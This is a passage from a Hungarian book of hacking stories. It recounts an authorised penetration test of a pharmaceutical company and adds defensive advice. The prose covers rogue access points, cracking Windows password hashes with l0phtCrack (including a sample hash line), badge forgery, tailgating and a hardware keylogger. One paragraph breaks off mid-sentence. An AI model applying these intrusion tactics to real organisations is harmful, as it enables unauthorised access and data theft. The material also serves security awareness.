Mire ők: – Húha, erről beszélnünk kell, néhány percre magunkra
tudnánk hagyni bennünket?
Ha nem lett volna szó ilyen dolgokról, igen komolyan
elgondolkodtunk volna az ajánlaton. Ők azonban megpróbáltak
becsapni minket.
A jelentés átadásakor tartott megbeszélésen – amely a két cég
képviselőinek utolsó tárgyalása volt – Mudge-ék már csak arra
törekedtek, hogy „biztosan meggyőződhessenek arról, hogy a
hálózatukon levő összes géphez teljes hozzáférésünk volt”. Carlos
emlékszik, ahogy jó néhány felsővezető elvörösödött, miközben
hallgatták a beszámolót.
Végül a l0pht csapat egyszerűen kisétált az ajtón. Megkapták a 15
ezer dollárt, de akkor nem adták el a vállalatot.

FIGYELMEZTETŐ JÁTÉK

Dustin Dykes biztonsági tanácsadó számára a pénzért végzett


hackelés „rendkívüli módon izgató. Megértem az adrenalin junkie-kat,
teljesen utánozhatatlan ez az érzés.” így, amikor a gyógyszergyártó
társaság – nevezzük „Biotech”-nek – tárgyalójába érkezett, hogy
megvitassa velük a számukra végzendő behatolási teszt részleteit, igen
jó hangulatban volt, és boldogan nézett a kihívás elé.
Cégének, a Callisma Inc.-nek (amely ma már az SBC része) vezető
biztonsági tanácsadójaként Dustin megkövetelte csapatától, hogy a
tárgyalásokon üzleti öltözékben jelenjenek meg. Túlöltözve érezte
magát, amikor a Biotech szakemberei farmerben, pólóban és
rövidnadrágban jelentek meg, különösen azért, mert Boston környékén
emberemlékezet óta nem volt olyan hideg tél, mint akkor.
Számítógépes, pontosabban hálózati üzemeltetéssel kapcsolatos
háttere ellenére Dustin mindig is biztonsági szakembernek tartotta
magát; ez a hozzáállás valószínűleg a légierőnél eltöltött szolgálat alatt
fejlődött ki benne, ahol, mint mondja: – Gyakoroltam a látens
paranoiámat: azt a biztonsági rögeszmét, hogy mindenki téged akar
elkapni.
A számítógépekkel a mostohaanyja révén találkozott hetedikes
korában. Akkoriban az asszony rendszergazdaként dolgozott egy
cégnek. Dustint lenyűgözte az idegen hangzású nyelv, amit anyja
munkabeszélgetései során használt a telefonban. Tizenhárom éves volt,
amikor „az egyik este anya hazahozott egy számítógépet, amit a
szobámba vittem, és úgy programoztam, hogy a Dungeons and
Dragons szerepjáték szereplőit készítse el, és dobjon helyettem a
dobókockával”. A Basic programnyelvről szóló könyvekben
elmélyedve és a barátoktól a lehető legtöbb információt magába szíva
Dustin folyamatosan gazdagította tudását. Saját magától megtanulta,
hogyan használja a modemet arra, hogy az anyja munkahelyére
betárcsázva kalandjátékokkal játsszon. Eleinte csak egyre több és több
időt akart a számítógép előtt tölteni, ám ahogy felnőtt, rájött, hogy
szabad szelleme nem bírná, hogy az életét egy gép előtt élje le.
Biztonsági tanácsadóként tehetségét a szabadság iránti igényével
ötvözheti. – Lenyűgöz ez a szakma – mondja. – Ez egy sakkjátszma.
Minden lépésre van válaszlépés. Minden lépéssel megváltozik az egész
játék dinamikája.

A megbízás szabályai

Minden vállalatnak érdemes lenne elgondolkodnia azon, hogy vajon


menynyire sebezhető – mennyire jó munkát végeznek szellemi
tulajdonuk védelmében, a nagy nyilvánosságot kapó betöréseket
óhatatlanul követő bizalomvesztés megelőzésében, illetve az
alkalmazottaik személyes információi után kutató elektronikus
behatolókkal szembeni védekezésben.
Egyes cégeket még ennél is szorongatóbb okok motiválnak, például
az, hogy ne fussanak bele a kormányzat ellenőrző szerveibe, mert az
egy fontos szerződés elvesztését jelenthetné, vagy visszavethetne egy
jelentős kutatási projektet. A Védelmi Minisztériummal szerződéses
viszonyban álló összes cég ebbe a kategóriába tartozik. Akárcsak azok
a titkos biotechnológiai kutatásokat végző cégek, amelyeket az
Élelmiszer– és Gyógyszerügyi Hatóság szigorúan figyelemmel kísér –
és a Callisma új ügyfele pontosan ebbe a körbe tartozott. Veszélyes
vegyi anyagokat használó laboratóriumok, ahol a tudósok olyan
kutatásokat végeztek, amelyekről a felbérelt hackerek nem akartak
tudni; igen komoly kihívásnak tűnt a megbízás.
A Biotech-kel folytatott első megbeszélésen a Callisma csapata
megtudta, hogy a cég minden olyan támadást szeretne velük
kipróbáltatni, amellyel egy igazi ellenség kísérletezhet: az egyszerűtől
az összetett műszaki támadásokig, social engineering és fizikai
betörésekig. A cég informatikai vezetői, mint ahogy az ilyenkor lenni
szokott, biztosak voltak benne, hogy a tesztelők minden kísérlete
kudarcot fog vallani. Így a Biotech a következő játékszabályhoz
ragaszkodott: megbízható erejű bizonyíték nélkül semmit sem
fogadnak el.
„Megszüntet és eláll tőle” alapon működő szabályokat dolgoztak ki a
teszthez. Egyes esetekben ez egyszerűen egy előre egyeztetett jelszót
takar, amelynek elhangzását követően azonnal leállnak a cég
működését esetleg negatívan befolyásoló támadással. A cég a feltört
információ kezelésével kapcsolatban is irányelveket adott – hogyan
tárolják, mikor és kinek adják át azokat.
Mivel a behatolási tesztek során fennáll a lehetősége olyan
események előfordulásának, amelyek akadályozzák a cég működését,
több „mi van, ha” jellegű kérdésben kell előzetesen megállapodni. Kit
fognak értesíteni, ha a szolgáltatásleállás veszélye forog fenn?
Pontosan a rendszer melyik részét lehet megpróbálni feltörni, és
hogyan? És honnan fogják a tesztelők tudni, hogy a támadás milyen
mértékben hajtható végre visszafordíthatatlan üzleti kár vagy veszteség
elkövetése nélkül?
Az ügyfelek gyakran csak technikai támadást magában foglaló
behatolási tesztet kérnek, és figyelmen kívül hagyják a többi veszélyt,
amelyek akár még inkább sebezhetővé tesznek egy vállalatot. Dustin
Dykes erről a következőket mondja:
Függetlenül attól, hogy mit mondanak, tudom, hogy elsődleges
céljuk a rendszerük gyengeségeinek az azonosítása, azonban a cégek
általában más módon sebezhetők Egy igazi támadó a legkisebb
ellenállás irányába halad, a biztonsági lánc leggyengébb láncszemét
fogja keresni. Miként a hegyről lefutó víz, a támadó is a legsimább utat
keresi, ami általában maga az ember.
Dustin azt tanácsolja, hogy a social engineering támadások mindig
szerepeljenek a cég behatolási tesztjében. (A social engineeringről
további információért lásd a 10. fejezetet: Social engineerek – Hogyan
működnek és hogyan akadályozzuk meg őket?)
De örömmel kihagyja a repertoár egy másik részét. Ha nem kell
fizikai behatolást megkísérelnie, akkor nem fog. Számára a fizikai
bejutás az utolsó lehetséges megoldás, még ha nála van is az „ingyen
szabadulsz” kártyája. – Ha valami igazán rosszul fog elsülni, akkor az
tutira akkor lesz, amikor az épületbe a biztonságiak vagy a gyanakvó
alkalmazottak figyelmét kikerülve próbálok bejutni – mondja.
Végül a behatolási tesztcsapatnak azt is tudnia kell, hogy mi a Szent
Grál. Ebben az igen nagy tétért zajló elektronikus nyomozó játékban
kulcsfontosságú ezt pontosan tisztázni. A gyógyszergyártó cég
esetében a pénzügyi feljegyzések, az ügyfelek, a szállítók, a gyártási
folyamatok és az K+F projektjeikről készített állományok voltak a
végső célpont.

Tervezés

Dustinnak a teszttel kapcsolatban kidolgozott tervbe szerint a


támadás „csendes futással” indult – visszafogott kezdés után apránként
egyre jobban előbújni, amíg valaki végül észre nem veszi őket és fel
nem emeli a zászlót. A megközelítés Dustin a behatolási
tesztprojektekről alkotott filozófiájából fejlődött ki, amelyre ő a red
teaming kifejezéssel hivatkozik.
Amit a red teaming próbálkozásoknál megpróbálok végrehajtani, az
a cégek által felvett védekezőhelyzetből következik. Azt mondják:
„képzeljük magunkat a támadó észjárásába. Hogyan védekezhetünk
ellene?” Ez már az elsőcsapás rajtuk. Csak akkor tudják, hogyan
cselekedjenek vagy reagáljanak, ha tudják, hogy mi a fontos számukra.
Egyetértek; ahogy Szun Ce mondja: Ismerd meg az ellenséget, és
ismerd meg önmagadat, így akár száz csatát is megvívhatsz vereség
nélkül.
Minden aprólékos behatolási teszt – feltéve, hogy az ügyfél
beleegyezik – a fejezet korábbi részében leírt támadástípusokat
használja.
Módszereinket négy területre bontjuk: műszaki jellegű belépés a
hálózatba, nagyrészt erről beszélünk. Social engineering, [amely a mi
értelmezésünk szerint az alábbiakat is tartalmazza:] lehallgatás és
shoulder surfing. Kukabúvárkodás. És a fizikai behatolás. Ez a négy
terület.
(A shoulder surfing szó szerint váll mögül való kifigyelést jelent,
találó kifejezés arra, amikor valaki titokban meglesi, ahogy egy
alkalmazott begépeli a jelszavát. Az ebben kellő gyakorlattal
rendelkező támadó képes úgy megfigyelni a gyorsan repülő ujjak által
leütött billentyűket, hogy közben látszólag oda sem néz.)

Támadás!

Az első nap Dustin besétált a Biotech aulájába. A biztonsági őr


fülkéjétől jobbra egy pihenőszoba és a céges kávézó volt, mindkettő
szabadon használható a látogatók számára is. Az őr másik oldalán az a
tárgyaló volt, ahol Dustin csapata az első megbeszélést folytatta a
Biotech vezetőivel. Az őrt úgy helyezték el, hogy az őrzött bejárathoz
való elsődleges utat jól szemmel tarthassa, a tárgyaló azonban teljesen
kiesett a látóköréből. Bárki besétálhatott, egy szót sem szóltak volna
hozzá. Pontosan ezt tette Dustin és a társa is. És ha már benn voltak,
rengeteg idejük volt arra, hogy kényelmesen körülnézzenek. Végtére is
senki nem tudta, hogy ott vannak.
Egy élő hálózati csatlakozót fedeztek fel, amely valószínűleg a cég
személyzetének kényelmét szolgálta azzal, hogy a megbeszélések alatt
hozzáférést kínált a céges hálózathoz. A laptopjából egy Ethernet
kábelt dugva a fali csatlakozóba, Dustin pontosan azt találta, amire
számított: a cég tűzfala mögül szerzett hozzáférést a hálózathoz, amely
így nyílt meghívást jelentett a céges rendszerbe.
Egy olyan jelenet következett, amihez már csak a Mission
Impossible zenéje hiányzott: Dustin egy kis vezeték nélküli hozzáférést
biztosító eszközt (a 6-1. ábrán látható eszközhöz hasonlót) rögzített a
falra, és az aljzatba csatlakoztatta azt. Az eszköz lehetővé tette Dustin
embereinek, hogy a cég épülete közelében parkoló autóban vagy
furgonban levő számítógépeikkel behatoljanak a Biotech hálózatába.
Egy ilyen „vezeték nélküli hozzáférési pont” (wireless access point –
WAP) jeleit akár 100 méter távolságban is fogni lehet. Egy nagy
érzékenységű irányított antenna segítségével még nagyobb távolságból
is csatlakozni lehet a rejtett WAP-hoz.
Dustin az európai csatornákon üzemelő vezeték nélküli hozzáférést
biztosító egységeket preferálja – amelyek jelentős előnyt biztosítanak a
behatolási csapatának, hiszen sokkal kevésbé valószínű, hogy ezeket a
frekvenciákat észreveszik. Ráadásul „nem is úgy néznek ki, mint egy
vezeték nélküli hozzáférési pont, így nem keltik fel az emberek
gyanakvását. Előfordult, hogy egy hónapig is fennhagytam őket,
anélkül, hogy észrevették és leszerelték volna.”
Amikor felhelyezi ezeket az egységeket, Dustin egy apró, ám
hivatalosnak tűnő matricát ragaszt fel, amelyen a következő szöveg
olvasható: „Az Információbiztonsági Szolgálat tulajdona. Tilos
eltávolítani.
A mínusz hét fokos napi csúcshőmérsékletben sem Dustinnak, sem a
Biotech imidzsével összhangban immár farmert és pólókat viselő
társainak nem volt kedvük a parkolóban álló kocsiban befagyasztani a
feneküket. Így nagyon jól jött nekik a Biotech által felajánlott, egy
közeli épületben levő, nem őrzött kis szoba. Semmi extra, de a
szobában meleg volt, és a vezeték nélküli eszköz hatósugarán belül
voltak. A csatlakozás működött – a cég szemszögéből egy kicsit
túlságosan is.
Amint elkezdték feltárni a Biotech hálózatot, az első kísérleti
felderítés során körülbelül 40 Windows-t futtató számítógépet találtak,
amelyeken rendszergazdai account volt jelszó nélkül vagy a
„password” jelszóval. Más szavakkal semmilyen biztonság nem volt,
ami – mint a korábbi történetekben már láttuk – a céges hálózatok
megbízható oldalán sajnos igen gyakran előfordul, hiszen a cégek a
határvédelemre összpontosítva próbálják meg kívül tartani a rossz
fiúkat, azonban a belül levő hostokat sebezhetően hagyják. Ha a
támadónak sikerül behatolnia vagy megkerülnie a tűzfalat, teljesen
szabadon mozoghat.
Amint feltörték az egyik gépet, Dustin leszedte az összes account
jelszó hashét, és a l0phtCrack programon átfuttatta ezt a fájlt.

Munkában a l0phtCrack

Egy Windows-os gépen a felhasználói jelszavak titkosított formában


(egy „hash-ben”) kerülnek tárolásra a Security Accounts Manager
(Biztonsági Fiókkezelő – SAM) nevű területen; a jelszavak nem
egyszerűen titkosítottak, hanem egy „egyirányú kivonatolás” (one-way
hash) néven ismert összezavart formában vannak titkosítva, ami azt
jelenti, hogy a titkosító algoritmus az egyszerű szöveges jelszót
titkosított formára konvertálja, azonban a titkosított formát nem képes
szöveggé visszaállítani.
A Windows operációs rendszer a hash két változatát tárolja a SAM-
ben. Az egyik a „LAN Manager hash” vagy más néven a LANMÁN,
egy legacy (régi program) verzió, az NT előtti idők maradványa. A
LANMAN hash a felhasználó jelszavának nagybetűs változatából
számítódik ki, és két, egyenként hétbetűs fél részre van osztva. A
tulajdonságai miatt ezt a típusú hash-t sokkal könynyebb feltörni, mint
az utódját, az NT LAN Managert (NTLM), amely többek között nem
konvertálja a karaktereket nagybetűssé.
Példaképpen álljon itt egy meg nem nevezett cég rendszergazdájának
a jelenlegi hash-e:
Administrator:500:AA33FDF289D20A799F33AF221F3220DC:0A
BC818FE05A120233838B9131F36BB1:::
A két kettőspont közötti, „AA33”-mal kezdődő és „20DC”-vel
végződő szakasz a LANMAN hash. A „OABC” és „6BB1” közötti rész
az NTLM hash. Mindkettő 32 karakter hosszú, mindkettő ugyanazt a
jelszót jelképezi, azonban az elsőt sokkal könnyebb feltörni, és
visszanyerni belőle az egyszerű szöveges jelszót.
Mivel a legtöbb felhasználó által választott jelszó egy név vagy egy
egyszerű szótári szó, a támadó általában azzal kezdi, hogy
„szótártámadás” végrehajtására állítja be a l0phtCracket (vagy az általa
használt bármely más jelszótörő programot) – vagyis a szótárban levő
minden egyes szót kipróbál, hátha azok közül valamelyik a jelszó. Ha a
program nem ér el eredményt a szótártámadással, a támadó egy „brute-
force” támadást indít: ebben az esetben a program minden lehetséges
kombinációt kipróbál (például AAA, AAB, AAC... ABA, ABB, ABC,
és így tovább), majd kis– és nagybetűket, számokat és szimbólumokat
tartalmazó kombinációkkal megy tovább.
Egy olyan hatékony program, mint a l0phtCrack, másodpercek alatt
feltöri az egyszerű, magától értetődő jelszavakat (az olyanokat,
amilyeneket a lakosság körülbelül 90 százaléka használ). A
bonyolultabbak órákat vagy napokat is igénybe vehetnek, előbb vagy
utóbb azonban majdnem mindegyik jelszó megadja magát.

Hozzáférés

Dustin rövidesen feltörte a jelszavak többségét.


Megpróbáltam a [rendszergazdai] jelszóval bejelentkezni az
elsődleges tartomány vezérlőbe, és sikerült is. Ugyanazt a jelszót
használták a helyi gépen, mint a domain accounton. Immár a teljes
tartományon rendszergazdai jogosultságom volt.
Az elsődleges tartománykezelő (primary domain controller – PDC) a
tartomány felhasználói accountjainak master adatbázisát kezeli.
Amikor egy felhasználó bejelentkezik a tartományba, a PDC a PDC
adatbázisban eltárolt információ alapján ellenőrzi a belépési kérés
jogosultságát. Az accountok ezen master adatbázisa
elővigyázatosságból a biztonsági tartományvezérlőbe (backup domain
controller – BDC) van másolva, arra az esetre, ha a PDC leállna. Ez az
architektúra alapjaiban változott meg a Windows 2000 megjelenésével.
A Windows ezen újabb változatai az úgynevezett Active Directory-i
használják, a régebbi verziókkal való kompatibilitás érdekében
azonban van legalább egy rendszer, amely a tartomány PDC-jeként
viselkedik.
Kulcsa volt a Biotech királysághoz, hozzáférést szerzett számtalan
belső, „bizalmas” vagy „csak belső használatra” címkézésű
dokumentumhoz. Mindeközben Dustin órákat töltött azzal, hogy
bizalmas információkat gyűjtsön a szigorúan titkos
gyógyszerbiztonsági fájlokból, amelyek részletes információkat
tartalmaztak a cég által tanulmányozott gyógyszerkészítmények
lehetséges mellékhatásairól. A Biotech tevékenységének természetéből
adódóan az ehhez az információhoz való hozzáférést szigorúan
szabályozza az Élelmiszer– és Gyógyszerügyi Hatóság, és a behatolási
teszt sikere esetén formális jelentést kell írni erről a Hatóságnak.
Dustin az alkalmazotti adatbázishoz is hozzáférést szerzett, amely az
alkalmazottak teljes nevét, e-mail címét, telefonszámát, részlegét,
beosztását stb. tartalmazta. Ennek az információnak a felhasználásával
képes volt meghatározni a támadás következő szakaszának célpontját.
A kiválasztott személy a behatolási teszt felügyeletével megbízott
céges rendszergazda volt. – Azt gondoltam, hogy bár már rengeteg
bizalmas információ van a kezemben, megmutatom nekik, hogy több
támadási vektor is van – ami azt jelenti, hogy egynél több módszer is
létezik az információ megszerzésére.
A Callisma csapata tudta, hogy ha a biztosított területre akarnak
belépni, annak legjobb módja, ha az ebédből visszatérő alkalmazottak
egy beszédes csoportjával vegyülnek el. A reggeli és esti órákhoz
képest, amikor az emberek idegesebbek és ingerlékenyebbek, ebéd után
kevésbé éberek, talán kicsit lelassulnak, miközben az imént
elfogyasztott ebédet emésztik. A párbeszédek barátiak, tele
bajtársiassággal. Dustin egyik kedvenc trükkje, hogy kifigyel valakit,
aki éppen elhagyni készül az étkezőt. Megelőzi a kiszemelt személyt,
tartja neki az ajtót, majd követi őt. Tízből kilenc esetben a célpont a
következő ajtó kinyitásával viszonozza a szívességet – akkor is, ha az
az ajtó őrzött területre vezet. És már benn is van, nem kell izgulni.

Megriadva

Miután kiválasztották a célszemélyt, a csapatnak ki kellett találnia,


hogyan jussanak be az őrzött területre, ahol majd egy
billentyűzetnaplózót (keystroke logger) telepítenek az adott alkalmazott
számítógépére – ez a berendezés a billentyűzeten leütött összes
billentyűleütést, még a rendszer felállása előtt leütötteket is feljegyzi. A
rendszergazda számítógépén valószínűleg a hálózaton levő különböző
rendszerek jelszavait is elkaphatják így. Ez azt is jelentheti, hogy a
behatolási tesztelők tudomást szereznek a behatolásaik észlelésére
irányuló kísérletekkel kapcsolatos minden üzenetről.
Dustin eltökélte, hogy nem kockáztatja meg tail-gatinggel a lebukást.
Egy kis social engineeringes trükkre volt szükség. Az aulába és az
étkezdébe való szabad bejárás során jól megnézte magának az
alkalmazottak belépőkártyáit, és elhatározta, hogy hamisít magának
egyet, A lógó nem jelentett problémát – egyszerűen lemásolta a cég
weboldaláról, és beillesztette az által készített designba. Biztos volt
benne, hogy közeli ellenőrzésen nem kell átesnie.
A Biotech egyes irodái egy közeli épületben helyezkedtek el, ahol
több cég is bérelt irodákat. Az előtérben egy őr posztolt, aki éjszaka és
hétvégén is szolgálatban volt, az ajtó pedig egy kártyaleolvasóval nyílt,
ha az alkalmazott a megfelelő elektronikus kódot tartalmazó
belépőkártyáját lehúzta rajta.
Felmentem az egyik hétvégén, és az általam készített hamis
belépőkártyával villogtam. Lehúzom a belépőkártyát a leolvasón,
amely természetesen nem működik. A biztonsági őr jön, kinyitja az ajtót
és mosolyog. Visszamosolygok, és már benn is vagytok.
Egyetlen szó nem hangzott el, de Danny sikeresen bejutott az őr által
védett területre.
A Biotech irodák azonban egy másik leolvasóval is védve voltak. És
az épületben hétvégenként gyakorlatilag nulla volt a forgalom.
Hétvégén senki nincs ott, aki mögött be lehetne surranni. Egy másik
bejáratot próbáltam keresni, így felmentem az üvegezett lépcsőházban
a második emeletre, és azt gondoltam, hogy kipróbálom az ajtót, majd
kiderül, hogy nyílik-e vagy nem. Kinyitottam, azonnal nyílt, nem kérte a
belépőkártyát.
Azonban mindenhol megszólaltak a riasztók. Nyilvánvalóan a
vészkijáraton mentem be. Beugrottam, és az ajtó becsapódott
mögöttem. Belülre azt volt írva az ajtóra: „Tilos kinyitni, különben
bekapcsol a riasztó.” A szívem kétszázzal kalapált.

A szellem

Dustin pontosan tudta, hogy melyik íróasztal felé tartson. A csapata


által feltört alkalmazotti adatbázis az alkalmazottak íróasztalának
fizikai elhelyezkedését is tartalmazta. Fülében még mindig a riasztó
hangjával a célszemély íróasztala felé haladt.
A támadó egy, a leütött billentyűket feljegyző, majd azokat e-
mailben egy megadott címre továbbító szoftver telepítésével is
megszerezheti a számítógépen végzett billentyűleütéseket. Dustin
azonban meg akarta mutatni az ügyfélnek, hogy a behatolással
szemben többféleképpen is sebezhetők, ezért fizikai eszköz
használatával érte el ugyanezt.
Az erre a célra kiválasztott eszköz a Keyghost volt (lásd 6-2. ábra).
Ez az ártalmatlan kinézetű objektum a billentyűzet és a számítógép
közé csatlakozik, és apró méretének köszönhetően majdnem biztos,
hogy észrevétlen marad. Van olyan modell, amely akár félmillió leütést
is képes megjegyezni, amely egy átlagos felhasználónál több heti
használatot jelent. (Van azonban egy árnyoldala is. A támadónak vissza
kell térnie a helyszínre, amikor eljön az idő a naplózó visszaszerzésére
és az adatok leolvasására.)

6-2. ábra: A Keyghost billentyűzetnaplózó


Csak másodpercekbe került, hogy Dustin kihúzza a számítógépből a
billentyűzet kábelét, bedugja a Keyghostot, és visszacsatlakoztassa a
kábelt. Igyekezett mindezt minél gyorsabban végrehajtani, mert „azt
feltételeztem, hogy a riasztást hallották, nem sok időm van már hátra, a
kezem enyhén remegett. El fognak kapni. Tudod, hogy lényegében
semmi rossz nem fog történni, mert ott van nálad az „ingyen
szabadulsz” kártya, de az adrenalinszint még így is egyre emelkedik”.
Amint Dustin telepítette a Keyghostot, a főlépcsőházat választva
lesétált az irodából, így közvetlenül a biztonsági őr állása mellett ért le
az előcsarnokba. Még egy adag social engineeringet alkalmazva
vakmerően elébe ment a problémának.
Szándékosan a közvetlenül a biztonsági őr mellett lévőajtón jöttem
ki, Ahelyett, hogy kifele menet megpróbáltam volna kikerülni az őrt,
odamentem egyenesen hozzá, és azt mondtam: – Nézze, sajnálom, hogy
beindult a riasztó, én voltam az. Soha nem szoktam átjönni ebbe az
épületbe, nem tudtam, hogy ez fog történni, elnézést kérek. – Mire az őr
azt válaszolta: – Ő, nem történt semmi.
Ezt követően a telefonhoz lépett, feltételezem, hogy a riasztó
beindulásakor felhívott valakit, és most azért hívta, hogy megmondja
neki: – Téves riasztás, minden rendben.
Nem maradtam ott meghallgatni, hogy mit fog mondani.

Kérdőre vonás nélkül

A behatolási teszt a végéhez közeledett. A cég biztonsági vezetői


hihetetlenül biztosak voltak abban, hogy a behatolási tesztelők nem
lesznek képesek behatolni a hálózatba, és nem tudnak jogosulatlan
fizikai hozzáférést szerezni az épületekhez, azonban mind ez ideig a
csapat egyetlen tagját sem vonták soha kérdőre. Dustin apránként
növelte a „zajszintet”, hogy jelenlétüket egyre nyilvánvalóbbá tegye.
Ennek ellenére még mindig semmi.
Kíváncsi lévén arra, hogy meddig mehetnek el. A csapat több tagjai
is bejutott az épületbe a tail-gating módszerével, ráadásul egy hatalmas
antennát cipeltek magukkal: egy feltűnő berendezést, amit igazán
nehéz volt hurcolni. Néhány alkalmazottnak biztosan észre kellene
vennie ezt a furcsa eszközt, elgondolkodni felette, majd riadót fújni.
A csapat – belépőkártya nélkül, hóna alatt a hatalmas antennával –
először a Biotech egyik, majd a másik őrzött épületében barangolt,
összesen három órán át. Senki nem szólt hozzájuk egyetlen szót sem.
Még csak egy olyan egyszerű kérdést sem tették fel nekik, hogy „Mi a
fene ez, amit cipelnek”? A legerősebb reakciót egy biztonsági őrtől
kapták, aki az egyik folyosón ment el mellettük, furcsán rájuk nézett,
majd továbbsétált anélkül, hogy akár csak a válla felett visszanézett
volta.
A Callisma csapat azt a következtetést vonta le, hogy – akárcsak a
legtöbb szervezetnél – itt is bárki besétálhat az utcáról, behozhatja a
saját berendezését, bejárhatja az épületeket, és soha nem fogják
megállítani vagy felszólítani, hogy igazolja magát, és mutassa az
engedélyét. Dustin és csapattársai a végletekig feszítették a húrt, de
soha nem vonták őket kérdőre.

Kézmelegítős trükk

Request to Exit (Kilépés kérése – REX) funkciónak hívják, és


gyakran előfordul az olyan üzleti létesítményekben, mint amilyen a
Biotech-é is. Amikor egy olyan védett területen, mint például a
kutatólaboratórium, belülről közelítünk az ajtó felé, a testünk
bekapcsolja a hő– vagy mozgásérzékelőt, amely kinyitja a zárat, így ki
tudunk sétálni; ha mondjuk egy tálcányi kémcsövet cipelünk vagy egy
teli kocsit tolunk, nem kell megállni, és a biztonsági eszközzel
bíbelődve kinyitni az ajtót. A kívülről történő bejutáshoz a megfelelő
azonosító belépőkártyát kell a kártyaleolvasó elé tartani, vagy be kell
pötyögni a biztonsági kódot.
Dustin megfigyelte, hogy a Biotech-nél számos REX-szel felszerelt
ajtónál rés volt alul. Azon gondolkodott, hogy hogyan juthatna be az
érzékelő megbolondításával. Ha az ajtón kívülről az emberi test hőjét
vagy mozgását
A tail-gaiting támadások kivédésének egyik módszere a
társadaiompszichológusok által udvariassági normának nevezett
viselkedési szabályok módosítása. Megfelelő képzéssel el kell érni,
hogy az alkalmazottak ne érezzék kényelmetlennek a mások
személyazonosságára és jogosultságaira való rákérdezést, ami gyakran
felmerül az épület vagy egy munkaterület védett bejáraton való
áthaladásakor. A megfelelően képzett alkalmazottak tudni fogják,
hogyan kérdezzenek rá a belépőkártya meglétére, amikor a másik
személy nyilvánvalóan őket kihasználva próbál meg átjutni a bejáraton.
Az alábbi egyszerű szabályt kell használni: kérdezzünk, hogy ha az
ismeretlennek nincsen belépőkártyája, irányítsuk a biztonsági őrhöz
vagy a recepcióshoz, azonban semmiképpen ne engedjünk be
magunkkal idegeneket a védett bejáraton.
Hamis céges azonosító belépőkártyák készítése túl egyszerű bejutást
tesz lehetővé a védettnek hitt épületbe. Még a biztonsági őrök sem
nézik meg elég alaposan a belépőkártyákat ahhoz, hogy meg tudják
állapítani az eredetiségüket. Nehezebb lenne ilyen belépőkártyát
készíteni, ha a cég olyan szabályt vezetne (és tartatna) be, amely
megköveteli, hogy az alkalmazottak, alvállalkozók és ideiglenes
munkavállalók levegyék belépőkártyájukat, amikor elhagyják az
épületet, hiszen így megfosztanák a támadókat attól a lehetőségtől,
hogy kényelmes körülmények között megfigyeljék a belépőkártya
designját.
Mindannyian tudjuk, hogy a biztonsági őrök nem fogják tüzetesen
megvizsgálni az összes alkalmazott személyi igazolványát (ami
tulajdonképpen majdnem teljesen lehetetlen lenne még a lelkiismeretes
őrök számára is, gondoljunk csak a reggel és a nap végén csoportosan
érkező emberek seregére). Ebből kifolyólag a nem kívánt bejutás elleni
védelem más módszereit kell mérlegelni. Az elektronikus
kártyaleolvasók felszerelése sokkal nagyobb fokú védelmet teremt.
Ezen túlmenően azonban fel kell készíteni a biztonsági őröket arra a
helyzetre, amikor a kártyaleolvasó nem ismeri fel valakinek a kártyáját,
hiszen – mint a történetben is láttuk –, előfordul, hogy nem a
rendszerben van egy pillanatnyi hiba, hanem éppen egy támadó kísérel
meg fizikailag bejutni.
Noha a biztonságtudatossági képzések egyre terjednek a cégek
körében, egyvalamiről majdnem mindig megfeledkeznek ezek során.
Még az aktív biztonságtudatossági programmal rendelkező cégek is
gyakran elhanyagolják a menedzserek különleges képzésének
szükségességét; pedig pontosan bennük kell azt tudatosítani, hogy
követeljék meg beosztottaiktól a kötelező biztonsági szabályok
betartását. Azoknak a cégeknek, amelyek nem képzik ki minden
alkalmazottjukat, alacsony a biztonsági szintjük.

ZÁRÓJELBEN

Ritkán van az olvasóknak lehetőségük arra, hogy betekintést


szerezzenek egy olyan valaki gondolkodásába és taktikájába, aki
jelentős mértékben hozzájárult a hackereszközök fegyvertárához.
Mudge és a l0phtCrack immár az informatikai történelemkönyvek
része.
A Dustin Dykes-féle történet azt sugallhatja, hogy a behatolási
tesztet megrendelő cégek sokszor a legelemibb érdekeiknek
ellentmondó döntést hoznak. Azonban mindaddig nem tudhatjuk, hogy
cégünk valójában mennyire sebezhető, amíg social engineering
módszereket és fizikai bejutást, illetve technikai alapú támadásokat is
magába foglaló, korlátozásoktól mentes behatolási teszttel ki nem
próbáljuk.

7. fejezet

A bankja természetesen biztonságos, ugye?


Ha megpróbálod a rendszereidet bolondbiztossá tenni, mindig lesz
egy nálad találékonyabb bolond.
Juban
Ha más szervezetek ugyan nem is járnak élen a biztonság terén, és
nem zárják be a hackerek előtt az ajtójukat, szeretnénk legalább azt
hinni, hogy a pénzünk biztonságban van, senki nem szerezheti meg
pénzügyeink adatait, vagy ami ennél is rosszabb, nem fér hozzá
bankszámlánkhoz, és nem irányíthatja át saját zsebébe a pénzünket.
A rossz hír az, hogy sok banknál és pénzügyi intézetnél nem olyan jó
a biztonság, ahogy azt az azért felelős szakemberek gondolják. Ezt
bizonyítják a következő történetek is.

A TÁVOLI ÉSZTORSZÁGBAN

Az alábbi történet tanúbizonyság arra, hogy egy olyan fickó, aki még
csak nem is hacker, sikeresen betörhet egy bankba. Ez nem jó hír sem a
bankoknak, sem nekünk.
Soha nem jártam még Észtországban, és könnyen lehet, hogy soha
nem is jutok el oda. Az ország nevének hallatán sötét erdőkkel és
babonás földművesekkel körülvett ősi kastélyok képe ugrik be – egy
olyanfajta helyé, ahol egy idegen megfelelő védelem nélkül nem
szívesen sétálgat. Ez az akaratlanul előtörő sztereotípia (amit a kelet-
európai erdőkben, falvakban és kastélyokban forgatott giccses,
alacsony költségvetésű horrorfilmek is alátámasztanak), mint kiderült,
nem is kicsit pontatlan.
A valóság teljesen más. Észtország sokkal fejlettebb, mint
gondoltam – tudtam meg egy Juhan nevű, ott élő hackertől. A
huszonhárom éves Juhan egyedül él egy tágas, négyszobás lakásban a
város szívében. A lakásban „nagyon magasan van a plafon, és tele van
színekkel”. Mint kiderült, Észtország egy körülbelül 1,3 millió lakosú
(körülbelül ennyien laknak Philadelphiában is) kis ország Oroszország
és a Balti tenger között. Tallint, a fővárost még mindig hatalmas
panelházak csúfítják el, szürke emlékművek, amelyek a rég felbomlott
szovjet birodalom azon próbálkozására emlékeztetnek, hogy az
alattvalókat a lehető leggazdaságosabb módon juttassák lakáshoz.
Juhan meséli: – Néha, amikor az emberek Észtországról akarnak
többet megtudni, ilyeneket kérdeznek: „Vannak nálatok orvosok? Van
egyáltalán egyetem?” A valóság ezzel szemben az, hogy Észtország
[2004] május elsején csatlakozott az Európai Unióhoz, – Sok észt,
folytatja a fiú, azért dolgozik, hogy a szovjet időkre emlékeztető vacak
